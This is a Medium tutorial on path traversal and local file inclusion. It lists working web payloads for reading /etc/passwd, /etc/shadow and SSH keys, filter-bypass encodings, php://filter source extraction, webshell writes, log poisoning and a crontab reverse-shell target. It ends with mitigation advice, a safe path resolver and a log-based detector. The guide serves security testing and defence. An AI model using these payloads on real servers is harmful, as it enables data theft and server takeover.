The Complete Guide to Path Traversal: Fundamentals, Exploitation, and Mitigation

medium.com · JPablo13 · 11 days ago · research
Learn how to identify, exploit, and mitigate path traversal and LFI vulnerabilities using advanced techniques and real-world payloads.

JPablo13 · ~5 min read · April 1, 2026 (Updated: April 1, 2026)

## What is Path Traversal?

It is a web security vulnerability that allows an attacker to read arbitrary files on the server running an application. In more severe cases, it can allow file writing, leading to data modification or full server control (RCE).

### Impact of the Vulnerability

- **Sensitive Data Disclosure:** Access to source code, database credentials, and configuration files.
- **OS Exposure:** Reading critical files such as `/etc/passwd` on Linux or `win.ini` on Windows.
- **Arbitrary Write:** Ability to upload a webshell to execute remote commands.

## Discovery: Identifying Entry Points

In addition to classic parameters (`?file=`, `?path=`), it is important to look for specific backend behaviors:

- **OS Detection:** Test Windows (`..\`) and Linux (`/`) paths simultaneously to identify the underlying operating system.
- **Error-Based:** Trigger errors with characters like `<>|` to force the server to reveal the absolute path in the error message.
- **Static Analysis:** Identify whether the server serves static resources (JS/CSS) through a dynamic controller, which is often vulnerable.

**Tip:** Observe the server's response. If modifying the parameter results in errors like `File not found` or `Permission denied`, it is a strong indicator that the server is attempting to interact directly with the file system.

## Exploitation Mechanisms

The attack is based on manipulating parameters that the application uses to construct file paths on the disk.
### Simple Reading

If an application loads images using `filename=218.png`, an attacker can use the `../` sequence to go back levels in the directory structure.

- Linux Example: `../../../etc/passwd`
- Windows Example: `..\..\..\windows\win.ini`

### Advanced Techniques

- **Use of Wrappers (PHP):** Use `php://filter` to obtain the source code of `.php` files encoded in Base64. Payload: `php://filter/convert.base64-encode/resource=index.php`.
- **Write Path Traversal:** If the function allows saving files, `../` can be used to place a malicious file in the web directory. Impact: achieve RCE (Remote Code Execution) through a backdoor.

## Advanced Exploitation and Escalation

Once access is confirmed, the goal is to maximize the impact.

### Source Code Exfiltration (PHP Wrappers)

In PHP applications, reading files directly sometimes fails because the file is executed instead of returned. Using wrappers allows extracting clean code.

- Technique: `php://filter/read=convert.base64-encode/resource=config.php`
- Result: You receive a Base64 string that, when decoded, reveals the source code and possible DB credentials.

### From Read to Write (RCE)

If the vulnerable point allows writing (e.g., an `uploadFile` function), an attempt can be made to upload a webshell.

- Injection: Use `filename=../../../var/www/html/shell.php`.
- Execution: Access via browser at `https://site.com/shell.php?cmd=id`.

### Special Cases

- **Null Byte (`%00`):** In older versions of languages (such as PHP < 5.3.4), it is used to truncate extensions forced by the application. Payload: `../../../etc/passwd%00.png` (the system reads up to the null byte, ignoring the `.png`).
- **Absolute Paths:** If the code does not concatenate the input to a base path, you can jump directly to the root. Payload: `filename=/etc/passwd`.

## Evasion Techniques (Bypass)

If an application blocks simple `../` sequences, there are methods to confuse the filter:

- **Nested Sequences:** If the filter removes `../`, use `....//` so that, when processed, it results in a valid sequence.
- **Null Byte (`%00`):** In older versions of PHP (< 5.3.4), it serves to truncate forced extensions like `.jpg` or `.php`.
- **Path Overloading:** Inject thousands of `/./` sequences to exceed the operating system's reading limit and force the opening of the desired file.

## Impact Escalation (Vulnerability Chaining)

A senior Bug Hunter does not stop at reading; they seek total compromise.

### From LFI to RCE (Log Poisoning)

If you have read access to server logs (Apache/Nginx):

- Injection: Make a request with malicious code (e.g.: ) in the User-Agent field.
- Execution: Access the log file via Path Traversal: `?file=../../../../var/log/apache2/access.log&cmd=id`.

### Code Exfiltration (Wrappers)

In PHP, use filters to obtain source code without executing it, revealing database credentials and encryption keys. Payload: `php://filter/convert.base64-encode/resource=config.php`.

## Critical Files to Consult

Depending on the operating system and services, these are the priority targets:

| System | File | Interest |
|---|---|---|
| Linux | `/etc/passwd` | User enumeration. |
| Linux | `/etc/shadow` | Password hashes (requires elevated privileges). |
| Linux | `~/.ssh/id_rsa` | SSH private keys. |
| Windows | `C:\windows\win.ini` | Vulnerability confirmation. |
| Windows | `C:\Windows\System32\drivers\etc\hosts` | Local network configuration. |

## Confirmation Payloads (Basic LFI)

Use these files to verify the vulnerability quickly and silently.

Linux/Unix based systems:

```
../../../../etc/passwd
../../../../etc/issue
../../../../proc/self/environ
../../../../etc/hostname
```

Windows systems:

```
..\..\..\..\windows\win.ini
..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\windows\system32\config\AppEvent.Evt
```

## Evasion Payloads (Bypassing Filters)

If simple sequences are blocked or removed, use these variants:

### Nested Sequences (Recursive Stripping)

Useful when the filter removes `../` but does not re-check the resulting string.
```
....//....//....//etc/passwd
....\/....\/....\/windows/win.ini
..././..././etc/passwd
```

### Character Encoding

Substituting dots and slashes with hexadecimal or Unicode representations.

- URL Encoding: `%2e%2e%2f%2e%2e%2fetc/passwd`
- Double URL Encoding: `%252e%252e%252f%252e%252e%252fetc/passwd`
- 16-bit Unicode filter evasion: `..%u2215..%u2215etc/passwd`
- Non-standard encodings: `..%c0%af` or `..%ef%bc%8f`

## Payloads for Specific Environments

### Forced Extension Bypass

If the application automatically adds an extension (e.g., `.png` or `.php`), try to truncate the string.

- Null Byte (PHP < 5.3.4): `../../../../etc/passwd%00.png`
- Parameter Expansion: `../../../../etc/passwd/.`
- Path Overloading (excessive length): `../../../etc/passwd/./././././.[hundreds of times]`

### PHP Wrappers (Exfiltration)

Ideal for extracting source code without the server interpreting it.

```
php://filter/convert.base64-encode/resource=config.php
php://filter/read=string.rot13/resource=index.php
```

## Writing and Escalation Checklist (RCE)

If the parameter allows saving data, the goal is to inject a shell.

| Technique | Payload / Target | Purpose |
|---|---|---|
| Web Directory | `../../../var/www/html/shell.php` | Write a webshell in the public root. |
| SSH Log Poisoning | `/var/log/auth.log` | Read logs to inject code via username. |
| Apache Logs | `/var/log/apache2/access.log` | Inject PHP code in the User-Agent and then read it. |
| User Crontab | `/var/spool/cron/crontabs/root` | Write a scheduled task to obtain a reverse shell. |

## Mitigation Strategies

Effective prevention focuses on never trusting direct user input to handle system files.

- **Whitelists:** The most robust defense. It consists of allowing only predefined filenames or using numerical identifiers (IDs) that the server internally maps to a secure file.
- **Path Normalization:** The server must resolve all `../` sequences before validating that the final path starts with the expected base directory (e.g., `/var/www/images/`).
- **Strict Sanitization:** Validate that the input contains only alphanumeric characters and reject any request containing dots or slashes.
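The whitelist and normalize-then-check mitigations above, written out as an added example (not code from the article). The base directory is the article's `/var/www/images`; the ID-to-file map and `naive_strip_once` are constructed for illustration, the latter being the single-pass filter that nested `....//` sequences defeat.

```python
import posixpath

BASE_DIR = "/var/www/images"   # the article's example base directory (hypothetical server)

# Approach 1 (whitelist): the client sends a numeric ID; the server owns the ID-to-file map,
# so no client-controlled string ever reaches the file system. Constructed sample map.
IMAGE_BY_ID = {218: "218.png", 219: "219.png"}

def image_path_by_id(image_id):
    name = IMAGE_BY_ID.get(image_id)
    return None if name is None else posixpath.join(BASE_DIR, name)

# Approach 2 (normalize, then check the prefix): collapse every "..", "." and "//" first and
# only then require the result to sit under BASE_DIR. posixpath keeps the check purely
# lexical so it runs the same on any OS; on a real server, os.path.realpath() should also
# follow symlinks before the comparison, and a Windows host must reject backslashes too.
def resolve_inside_base(user_input, base=BASE_DIR):
    if "\x00" in user_input:            # null-byte truncation attempt: reject outright
        return None
    base_norm = posixpath.normpath(base)
    # join() discards `base` when user_input is absolute, so "/etc/passwd" fails the prefix test
    candidate = posixpath.normpath(posixpath.join(base, user_input))
    if candidate == base_norm or candidate.startswith(base_norm + "/"):
        return candidate
    return None

# For contrast: the naive filter the article describes. Removing "../" once turns
# "....//" back into "../", which is why the check must run after normalization.
def naive_strip_once(user_input):
    return user_input.replace("../", "")
```

With the resolver, `....//....//etc/passwd` stays inside the base directory as a harmless non-existent name, while the naive filter collapses it to `../../etc/passwd`.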
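On the detection side, an added example (not from the article) that flags the evasion payloads listed earlier in web access logs: it undoes double URL encoding, maps the `%u2215`, `%c0%af` and `%ef%bc%8f` slash variants, then looks for dot-dot sequences, null bytes, `php://` wrappers, `/./` path overloading and a PHP tag in the User-Agent (log poisoning). The log lines and rule names are constructed for this example.

```python
import re
from urllib.parse import unquote

# Alternative encodings of "/" from the evasion list (16-bit Unicode and overlong UTF-8 forms).
ALT_SLASH = ("%u2215", "%c0%af", "%ef%bc%8f")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')   # request target in a Combined Log Format line
DOTDOT_RE = re.compile(r"\.{2,}/")          # ../ plus nested forms such as ....// and ..././
DOT_SEGMENT_RE = re.compile(r"/\.(?=/)")    # one /./ segment; many of them = path overloading

def canonicalize(raw, rounds=3):
    """Undo up to `rounds` layers of URL encoding, map alternate slashes to "/", unify backslashes."""
    s = raw.lower()
    for _ in range(rounds):
        for enc in ALT_SLASH:
            s = s.replace(enc, "/")
        decoded = unquote(s)
        if decoded == s:                # nothing left to decode
            break
        s = decoded
    return s.replace("\\", "/")

def traversal_indicators(line):
    """Names of the rules one access-log line triggers (empty list means nothing suspicious)."""
    hits = []
    m = REQUEST_RE.search(line)
    if not m:
        return hits
    path = canonicalize(m.group(1))
    if DOTDOT_RE.search(path):
        hits.append("dot-dot-slash")
    if "\x00" in path:
        hits.append("null-byte")
    if "php://" in path:
        hits.append("php-wrapper")
    if len(DOT_SEGMENT_RE.findall(path)) >= 10:
        hits.append("path-overloading")
    if "<?php" in line.lower():         # log poisoning attempt: PHP tag in the User-Agent field
        hits.append("php-tag-in-request")
    return hits

# Constructed sample lines (not real traffic); the last one is a benign image request.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Apr/2026:10:00:00 +0000] "GET /image?filename=..%252f..%252fetc/passwd HTTP/1.1" 200 512 "-" "curl/8.0"',
    '10.0.0.5 - - [01/Apr/2026:10:00:01 +0000] "GET /image?filename=....//....//etc/passwd HTTP/1.1" 404 0 "-" "curl/8.0"',
    '10.0.0.5 - - [01/Apr/2026:10:00:02 +0000] "GET /image?filename=..%u2215..%u2215etc/passwd%00.png HTTP/1.1" 404 0 "-" "curl/8.0"',
    '10.0.0.5 - - [01/Apr/2026:10:00:03 +0000] "GET /page?file=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 900 "-" "curl/8.0"',
    '10.0.0.7 - - [01/Apr/2026:10:00:04 +0000] "GET /image?filename=218.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

def scan(lines):   # (index, rule names) for every line that triggers at least one rule
    return [(i, h) for i, l in enumerate(lines) for h in [traversal_indicators(l)] if h]
```

Because every rule runs on the canonical form, a single-encoded, double-encoded or `%u2215`-encoded `../` all reduce to the same `dot-dot-slash` hit.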